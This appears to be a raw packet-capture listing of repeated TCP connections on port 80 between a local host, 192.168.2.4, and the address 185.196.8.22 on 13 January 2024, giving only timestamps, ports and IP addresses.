                                                                                                                                                        Jan 13, 2024 06:32:58.479305983 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.664894104 CET8049742185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:58.664966106 CET4974280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.665066957 CET8049743185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:58.665141106 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.666810989 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.852902889 CET8049743185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:58.883490086 CET8049743185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:58.883574009 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.994115114 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.215150118 CET8049743185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:59.215221882 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.337743998 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.338231087 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.524311066 CET8049743185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:59.524377108 CET8049744185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:59.524494886 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.524619102 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.524748087 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.710566044 CET8049744185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:59.741477966 CET8049744185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:59.741790056 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.853621006 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.070429087 CET8049744185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:00.070538044 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.182375908 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.406045914 CET8049744185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:00.406136990 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.525379896 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.525752068 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.711555958 CET8049744185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:00.711704016 CET8049745185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:00.711899042 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.711960077 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.712280035 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.898427010 CET8049745185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:00.928683996 CET8049745185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:00.928790092 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.041418076 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.263536930 CET8049745185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:01.263663054 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.386909962 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.387403965 CET4974680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.573206902 CET8049745185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:01.573322058 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.573693991 CET8049746185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:01.573801994 CET4974680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.574083090 CET4974680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.760930061 CET8049746185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:01.791479111 CET8049746185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:01.791572094 CET4974680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.916584969 CET4974680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.917304993 CET4974780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.102874041 CET8049746185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.103002071 CET4974680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.103462934 CET8049747185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.103658915 CET4974780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.104852915 CET4974780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.291224957 CET8049747185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.326613903 CET8049747185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.326811075 CET4974780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.449719906 CET4974780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.450042009 CET4974880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.636183023 CET8049748185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.636248112 CET8049747185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.636548996 CET4974880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.636552095 CET4974780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.636725903 CET4974880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.823101997 CET8049748185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.853491068 CET8049748185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.853801966 CET4974880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.995610952 CET4974880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.996082067 CET4974980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.182034969 CET8049748185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.182121992 CET8049749185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.182290077 CET4974880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.182332039 CET4974980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.182521105 CET4974980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.369158030 CET8049749185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.405860901 CET8049749185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.406162024 CET4974980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.525754929 CET4974980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.526201963 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.712014914 CET8049749185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.712078094 CET8049750185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.712131977 CET4974980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.712214947 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.712527990 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.900110006 CET8049750185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.931130886 CET8049750185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.931258917 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.041182995 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.266657114 CET8049750185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:04.266748905 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.387151957 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.387686014 CET4975180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.573446989 CET8049750185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:04.573478937 CET8049751185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:04.573566914 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.573710918 CET4975180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.574387074 CET4975180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.778069973 CET8049751185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:04.808871984 CET8049751185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:04.809140921 CET4975180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.942831993 CET4975180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.943419933 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.128801107 CET8049751185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:05.129059076 CET4975180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.129344940 CET8049752185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:05.129487038 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.129722118 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.315696955 CET8049752185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:05.351854086 CET8049752185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:05.352066040 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.463480949 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.681056023 CET8049752185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:05.681287050 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.793431997 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.010400057 CET8049752185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:06.010657072 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.138029099 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.138797045 CET4975380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.324012041 CET8049752185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:06.324117899 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.324538946 CET8049753185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:06.324644089 CET4975380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.324937105 CET4975380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.510740995 CET8049753185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:06.546228886 CET8049753185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:06.546605110 CET4975380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.668463945 CET4975380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.669007063 CET4975480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.854470015 CET8049753185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:06.854556084 CET4975380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.854687929 CET8049754185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:06.854767084 CET4975480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.855163097 CET4975480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:07.040931940 CET8049754185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:07.072206020 CET8049754185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:07.072567940 CET4975480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:07.182902098 CET4975480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:07.405956984 CET8049754185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:07.406023026 CET4975480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:07.525722980 CET4975480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:07.526361942 CET4975580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:07.712887049 CET8049754185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:07.712953091 CET8049755185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:07.713140011 CET4975480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:07.713331938 CET4975580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:07.714122057 CET4975580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:07.900322914 CET8049755185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:07.930588007 CET8049755185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:07.930792093 CET4975580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:08.041169882 CET4975580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:08.262914896 CET8049755185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:08.263178110 CET4975580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:08.385014057 CET4975580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:08.385545969 CET4975680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:08.571403027 CET8049755185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:08.571526051 CET4975580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:08.571860075 CET8049756185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:08.571957111 CET4975680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:08.572235107 CET4975680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:08.758392096 CET8049756185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:08.788881063 CET8049756185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:08.789092064 CET4975680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:08.901734114 CET4975680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:09.127883911 CET8049756185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:09.128509998 CET8049756185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:09.128870964 CET4975680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:09.244364977 CET4975680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:09.244851112 CET4975780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:09.430813074 CET8049756185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:09.430841923 CET8049757185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:09.430994987 CET4975780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:09.431061983 CET4975680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:09.431405067 CET4975780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:09.617533922 CET8049757185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:09.647475958 CET8049757185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:09.647600889 CET4975780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:09.764830112 CET4975780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:09.981295109 CET8049757185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:09.981384039 CET4975780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:10.106203079 CET4975780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:10.106911898 CET4975880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:10.292205095 CET8049757185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:10.292469025 CET4975780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:10.292907953 CET8049758185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:10.292999029 CET4975880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:10.293401003 CET4975880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:10.479598999 CET8049758185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:10.514431953 CET8049758185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:10.514841080 CET4975880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:10.637371063 CET4975880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:10.638139963 CET4975980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:10.823710918 CET8049758185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:10.823908091 CET4975880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:10.824208021 CET8049759185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:10.824314117 CET4975980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:10.824712038 CET4975980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:11.010710955 CET8049759185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:11.041846991 CET8049759185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:11.041987896 CET4975980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:11.173372030 CET4975980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:11.174005032 CET4976080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:11.359442949 CET8049759185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:11.359525919 CET4975980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:11.359925032 CET8049760185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:11.360022068 CET4976080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:11.360379934 CET4976080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:11.546143055 CET8049760185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:11.581237078 CET8049760185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:11.582364082 CET4976080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:11.699915886 CET4976080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:11.700527906 CET4976180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:11.886609077 CET8049760185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:11.887006998 CET4976080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:11.887312889 CET8049761185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:11.887428045 CET4976180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:11.887798071 CET4976180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:12.073638916 CET8049761185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:12.116878986 CET8049761185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:12.116986990 CET4976180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:12.231085062 CET4976180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:12.417300940 CET8049761185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:12.449938059 CET8049761185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:12.450032949 CET4976180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:12.574639082 CET4976180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:12.575325966 CET4976280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:12.760967016 CET8049761185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:12.761082888 CET4976180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:12.761471033 CET8049762185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:12.761559963 CET4976280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:12.761931896 CET4976280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:12.947765112 CET8049762185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:12.978080988 CET8049762185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:12.978147984 CET4976280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:13.090413094 CET4976280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:13.315984011 CET8049762185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:13.320611000 CET8049762185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:13.320774078 CET4976280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:13.434138060 CET4976280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:13.620373011 CET8049762185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:13.650706053 CET8049762185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:13.650842905 CET4976280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:13.783555984 CET4976280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:13.785033941 CET4976380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:13.970181942 CET8049762185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:13.970257998 CET4976280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:13.970982075 CET8049763185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:13.971076965 CET4976380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:13.971772909 CET4976380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:14.158085108 CET8049763185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:14.193152905 CET8049763185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:14.193439960 CET4976380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:14.309309959 CET4976380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:14.526736975 CET8049763185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:14.526839018 CET4976380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:14.658284903 CET4976380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:14.659003019 CET4976480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:14.845639944 CET8049763185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:14.845808983 CET4976380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:14.846172094 CET8049764185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:14.846507072 CET4976480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:14.846693039 CET4976480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:15.033066988 CET8049764185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:15.062879086 CET8049764185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:15.063143969 CET4976480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:15.199897051 CET4976480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:15.200484037 CET4976580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:15.386491060 CET8049764185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:15.386553049 CET8049765185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:15.386738062 CET4976480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:15.386869907 CET4976580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:15.387190104 CET4976580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:15.574409008 CET8049765185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:15.609944105 CET8049765185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:15.610033035 CET4976580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:15.731851101 CET4976580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:15.732871056 CET4976680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:15.917977095 CET8049765185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:15.918075085 CET4976580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:15.918930054 CET8049766185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:15.919037104 CET4976680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:15.931714058 CET4976680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:16.118030071 CET8049766185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:16.154150009 CET8049766185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:16.154258966 CET4976680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:16.277714968 CET4976680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:16.278592110 CET4976780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:16.465208054 CET8049766185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:16.465295076 CET4976680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:16.465987921 CET8049767185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:16.466103077 CET4976780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:16.786056042 CET4976780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:16.972210884 CET8049767185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:17.002783060 CET8049767185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:17.003040075 CET4976780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:17.333622932 CET4976780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:17.395694017 CET4976880192.168.2.4185.196.8.22
